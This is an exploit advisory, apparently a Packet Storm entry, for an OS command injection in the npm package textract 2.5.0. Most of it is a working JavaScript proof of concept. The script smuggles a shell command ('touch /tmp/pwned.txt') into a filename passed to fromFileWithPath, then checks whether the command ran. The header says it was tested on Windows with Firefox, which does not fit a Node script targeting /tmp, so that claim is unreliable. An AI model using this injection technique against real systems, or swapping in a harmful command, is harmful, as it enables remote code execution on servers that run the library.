Share
## https://sploitus.com/exploit?id=PACKETSTORM:219858
==================================================================================================================================
| # Title : textract 2.5.0 OS Command Injection via Unsafe Filename Handling Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/textract |
==================================================================================================================================
[+] Summary : In textract version 2.5.0, a security vulnerability allows OS command injection when untrusted file paths are processed by the library.
[+] POC : exploit-basic.js
const textract = require('textract');
const maliciousFileName = 'test"; touch /tmp/pwned.txt; echo ".doc';
console.log("[+] CVE-2026-26831 - textract OS Command Injection Exploit");
console.log("[+] Malicious filename:", maliciousFileName);
console.log("[+] Attempting to extract text from malicious file...");
textract.fromFileWithPath(maliciousFileName, { preserveLineBreaks: true }, (error, text) => {
if (error) {
console.log("[!] Extraction failed (but command may have executed)");
console.log("Error:", error.message);
} else {
console.log("[+] Extraction completed (injection might still have worked)");
console.log("Extracted text:", text);
}
console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================